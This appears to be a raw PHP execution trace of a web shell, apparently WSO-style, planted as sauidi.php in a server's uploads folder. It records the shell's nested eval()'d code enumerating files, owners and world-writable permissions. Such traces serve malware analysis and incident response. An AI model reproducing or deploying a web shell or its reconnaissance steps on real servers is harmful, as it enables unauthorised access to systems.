file_exists 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 1 '/var/www/html/uploads/.' 5 98 1 0.018494 991432 5 98 R TRUE 5 99 0 0.018529 991392 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 1 '/var/www/html/uploads/.' 5 99 1 0.018549 991432 5 99 R 16895 5 100 0 0.018568 991392 sprintf 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 2 '%o' 16895 5 100 1 0.018590 991776 5 100 R '40777' 5 101 0 0.018605 991712 substr 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 2 '40777' -4 5 101 1 0.018619 991808 5 101 R '0777' 4 97 1 0.018632 991424 4 97 R '0777' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1616 $file['pir2'] = '0777' 4 102 0 0.018672 991568 filemtime 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1617 1 '/var/www/html/uploads/.' 4 102 1 0.018688 991608 4 102 R 1676250045 4 103 0 0.018702 991520 date 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1617 2 'Y-m-d H:i:s' 1676250045 4 103 1 0.018735 991848 4 103 R '2023-02-12 20:00:45' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1620 $folder = ' [ . ]dir2023-02-12 20:00:45root/rootdrwxrwxrwx \r\n \r\n \r\n0777R - C - ' [ .. ]dir2023-02-12 20:00:45root/rootdrwxrwxrwx \r\n \r\n \r\n0777R - C - [ . ]dir2023-02-12 20:00:45root/rootdrwxrwxrwx \r\n \r\n \r\n0777R - C - 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1611 $on3 = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 4 108 0 0.018969 992088 filegroup 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 1 '/var/www/html/uploads/prepend.php' 4 108 1 0.018984 992128 4 108 R 0 4 109 0 0.018996 992024 posix_getgrgid 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 1 0 4 109 1 0.019019 992680 4 109 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 4 110 0 0.019067 992088 is_dir 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1613 1 '/var/www/html/uploads/prepend.php' 4 110 1 0.019087 992128 4 110 R FALSE 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1622 $file = [] 4 111 0 0.019120 991312 strpos 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1623 2 'prepend.php' '.' 4 111 1 0.019139 991384 4 111 R 7 4 112 0 0.019155 991312 explode 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1623 2 '.' 'prepend.php' 4 112 1 0.019174 991824 4 112 R [0 => 'prepend', 1 => 'php'] 4 113 0 0.019196 991752 end 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1623 1 [0 => 'prepend', 1 => 'php'] 4 113 1 0.019216 992160 4 113 R 'php' 4 114 0 0.019235 991344 strtolower 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1623 1 'php' 4 114 1 0.019254 991376 4 114 R 'php' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1623 $ext = 'php' 4 115 0 0.019289 991472 wsoPermsColor 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1624 1 '/var/www/html/uploads/prepend.php' 5 116 0 0.019309 991472 is_readable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1990 1 '/var/www/html/uploads/prepend.php' 5 116 1 0.019335 991512 5 116 R TRUE 5 117 0 0.019354 991472 is_writable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 '/var/www/html/uploads/prepend.php' 5 117 1 0.019377 991512 5 117 R FALSE 5 118 0 0.019396 991472 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 '/var/www/html/uploads/prepend.php' 5 118 1 0.019415 991512 5 118 R 33261 5 119 0 0.019433 991472 wsoPerms 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 33261 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1995 $i = '-' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2001 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2002 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2003 $i .= 'x' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2004 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2005 $i .= '-' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2006 $i .= 'x' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2007 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2008 $i .= '-' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2009 $i .= 'x' 5 119 1 0.019596 991512 5 119 R '-rwxr-xr-x' 4 115 1 0.019617 991536 4 115 R '-rwxr-xr-x' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1624 $file['pir'] = '-rwxr-xr-x' 4 120 0 0.019671 992008 perm 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1625 1 '/var/www/html/uploads/prepend.php' 5 121 0 0.019692 992008 file_exists 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 1 '/var/www/html/uploads/prepend.php' 5 121 1 0.019718 992048 5 121 R TRUE 5 122 0 0.019737 992008 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 1 '/var/www/html/uploads/prepend.php' 5 122 1 0.019758 992048 5 122 R 33261 5 123 0 0.019777 992008 sprintf 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 2 '%o' 33261 5 123 1 0.019797 992392 5 123 R '100755' 5 124 0 0.019816 992328 substr 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 2 '100755' -4 5 124 1 0.019836 992424 5 124 R '0755' 4 120 1 0.019855 992040 4 120 R '0755' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1625 $file['pir2'] = '0755' 4 125 0 0.019896 992024 filesize 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1626 1 '/var/www/html/uploads/prepend.php' 4 125 1 0.019917 992064 4 125 R 57 4 126 0 0.019936 991960 number_format 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1626 2 0.0556640625 2 4 126 1 0.019959 992072 4 126 R '0.06' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1626 $file['size'] = '0.06' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1627 $file['link'] = 'prepend.php' 4 127 0 0.020019 992328 filemtime 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1628 1 '/var/www/html/uploads/prepend.php' 4 127 1 0.020039 992368 4 127 R 1676250045 4 128 0 0.020057 992264 date 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1628 2 'Y-m-d H:i:s' 1676250045 4 128 1 0.020102 992592 4 128 R '2023-02-12 20:00:45' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1631 $file = 'prepend.php0.062023-02-12 20:00:45root/root-rwxr-xr-x \r\n \r\n \r\n0755E - 'sauidi.php29.362023-02-12 20:00:45osboxes/osboxes-rw-rw-r-- \r\n \r\n \r\n0664E - prepend.php0.062023-02-12 20:00:45root/root-rwxr-xr-x \r\n \r\n \r\n0755E - 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1611 $on3 = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 4 133 0 0.020417 992120 filegroup 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 1 '/var/www/html/uploads/data' 4 133 1 0.020437 992160 4 133 R 0 4 134 0 0.020455 992064 posix_getgrgid 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 1 0 4 134 1 0.020489 992720 4 134 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 4 135 0 0.020540 992120 is_dir 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1613 1 '/var/www/html/uploads/data' 4 135 1 0.020568 992160 4 135 R TRUE 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1613 $file = [] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1614 $file['link'] = '[ data ]' 4 136 0 0.020627 992704 wsoPermsColor 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1615 1 '/var/www/html/uploads/data' 5 137 0 0.020648 992704 is_readable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1990 1 '/var/www/html/uploads/data' 5 137 1 0.020672 992744 5 137 R TRUE 5 138 0 0.020691 992704 is_writable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 '/var/www/html/uploads/data' 5 138 1 0.020714 992744 5 138 R TRUE 5 139 0 0.020733 992704 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1992 1 '/var/www/html/uploads/data' 5 139 1 0.020752 992744 5 139 R 16895 5 140 0 0.020770 992704 wsoPerms 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1992 1 16895 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1997 $i = 'd' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2001 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2002 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2003 $i .= 'x' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2004 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2005 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2006 $i .= 'x' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2007 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2008 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2009 $i .= 'x' 5 140 1 0.020930 992744 5 140 R 'drwxrwxrwx' 4 136 1 0.020951 992768 4 136 R 'drwxrwxrwx' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1615 $file['pir'] = 'drwxrwxrwx' 4 141 0 0.021007 992832 perm 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1616 1 '/var/www/html/uploads/data' 5 142 0 0.021028 992832 file_exists 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 1 '/var/www/html/uploads/data' 5 142 1 0.021053 992872 5 142 R TRUE 5 143 0 0.021072 992832 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 1 '/var/www/html/uploads/data' 5 143 1 0.021092 992872 5 143 R 16895 5 144 0 0.021108 992832 sprintf 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 2 '%o' 16895 5 144 1 0.021127 993216 5 144 R '40777' 5 145 0 0.021151 993152 substr 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 2 '40777' -4 5 145 1 0.021175 993248 5 145 R '0777' 4 141 1 0.021200 992864 4 141 R '0777' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1616 $file['pir2'] = '0777' 4 146 0 0.021254 992992 filemtime 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1617 1 '/var/www/html/uploads/data' 4 146 1 0.021281 993032 4 146 R 1676250045 4 147 0 0.021304 992936 date 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1617 2 'Y-m-d H:i:s' 1676250045 4 147 1 0.021354 993264 4 147 R '2023-02-12 20:00:45' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1620 $folder = ' [ data ]dir2023-02-12 20:00:45root/rootdrwxrwxrwx \r\n \r\n \r\n0777R - C - ' [ .. ]dir2023-02-12 20:00:45root/rootdrwxrwxrwx \r\n \r\n \r\n0777R - C - ' [ . ]dir2023-02-12 20:00:45root/rootdrwxrwxrwx \r\n \r\n \r\n0777R - C - [ data ]dir2023-02-12 20:00:45root/rootdrwxrwxrwx \r\n \r\n \r\n0777R - C - 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1611 $on3 = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 4 152 0 0.021746 993480 filegroup 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 1 '/var/www/html/uploads/.htaccess' 4 152 1 0.021766 993520 4 152 R 0 4 153 0 0.021784 993424 posix_getgrgid 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 1 0 4 153 1 0.021826 994080 4 153 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 4 154 0 0.021886 993480 is_dir 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1613 1 '/var/www/html/uploads/.htaccess' 4 154 1 0.021910 993520 4 154 R FALSE 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1622 $file = [] 4 155 0 0.021953 992712 strpos 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1623 2 '.htaccess' '.' 4 155 1 0.021975 992784 4 155 R 0 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1623 $ext = '' 4 156 0 0.022019 992832 wsoPermsColor 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1624 1 '/var/www/html/uploads/.htaccess' 5 157 0 0.022044 992832 is_readable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1990 1 '/var/www/html/uploads/.htaccess' 5 157 1 0.022076 992872 5 157 R TRUE 5 158 0 0.022098 992832 is_writable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 '/var/www/html/uploads/.htaccess' 5 158 1 0.022123 992872 5 158 R FALSE 5 159 0 0.022148 992832 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 '/var/www/html/uploads/.htaccess' 5 159 1 0.022173 992872 5 159 R 33188 5 160 0 0.022206 992832 wsoPerms 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 33188 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1995 $i = '-' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2001 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2002 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2003 $i .= '-' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2004 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2005 $i .= '-' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2006 $i .= '-' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2007 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2008 $i .= '-' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2009 $i .= '-' 5 160 1 0.022455 992872 5 160 R '-rw-r--r--' 4 156 1 0.022508 992896 4 156 R '-rw-r--r--' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1624 $file['pir'] = '-rw-r--r--' 4 161 0 0.022565 993336 perm 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1625 1 '/var/www/html/uploads/.htaccess' 5 162 0 0.022588 993336 file_exists 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 1 '/var/www/html/uploads/.htaccess' 5 162 1 0.022618 993376 5 162 R TRUE 5 163 0 0.022641 993336 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 1 '/var/www/html/uploads/.htaccess' 5 163 1 0.022661 993376 5 163 R 33188 5 164 0 0.022680 993336 sprintf 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 2 '%o' 33188 5 164 1 0.022711 993720 5 164 R '100644' 5 165 0 0.022734 993656 substr 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 2 '100644' -4 5 165 1 0.022757 993752 5 165 R '0644' 4 161 1 0.022778 993368 4 161 R '0644' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1625 $file['pir2'] = '0644' 4 166 0 0.022825 993336 filesize 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1626 1 '/var/www/html/uploads/.htaccess' 4 166 1 0.022847 993376 4 166 R 64 4 167 0 0.022869 993280 number_format 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1626 2 0.0625 2 4 167 1 0.022894 993392 4 167 R '0.06' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1626 $file['size'] = '0.06' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1627 $file['link'] = '.htaccess' 4 168 0 0.022957 993640 filemtime 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1628 1 '/var/www/html/uploads/.htaccess' 4 168 1 0.022977 993680 4 168 R 1676250045 4 169 0 0.022995 993584 date 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1628 2 'Y-m-d H:i:s' 1676250045 4 169 1 0.023038 993912 4 169 R '2023-02-12 20:00:45' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1631 $file = '.htaccess0.062023-02-12 20:00:45root/root-rw-r--r-- \r\n \r\n \r\n0644E - R - 'sauidi.php29.362023-02-12 20:00:45osboxes/osboxes-rw-rw-r-- \r\n \r\n \r\n0664E - 'prepend.php0.062023-02-12 20:00:45root/root-rwxr-xr-x \r\n \r\n \r\n0755E - .htaccess0.062023-02-12 20:00:45root/root-rw-r--r-- \r\n \r\n \r\n0644E - R - ' [ .. ]dir2023-02-12 20:00:45root/rootdrwxrwxrwx \r\n \r\n \r\n0777R - C - ' [ . ]dir2023-02-12 20:00:45root/rootdrwxrwxrwx \r\n \r\n \r\n0777R - C - ' [ data ]dir2023-02-12 20:00:45root/rootdrwxrwxrwx \r\n \r\n \r\n0777R - C - 'sauidi.php29.362023-02-12 20:00:45osboxes/osboxes-rw-rw-r-- \r\n \r\n \r\n0664E - 'prepend.php0.062023-02-12 20:00:45root/root-rwxr-xr-x \r\n \r\n \r\n0755E - '.htaccess0.062023-02-12 20:00:45root/root-rw-r--r-- \r\n \r\n \r\n0644E - R -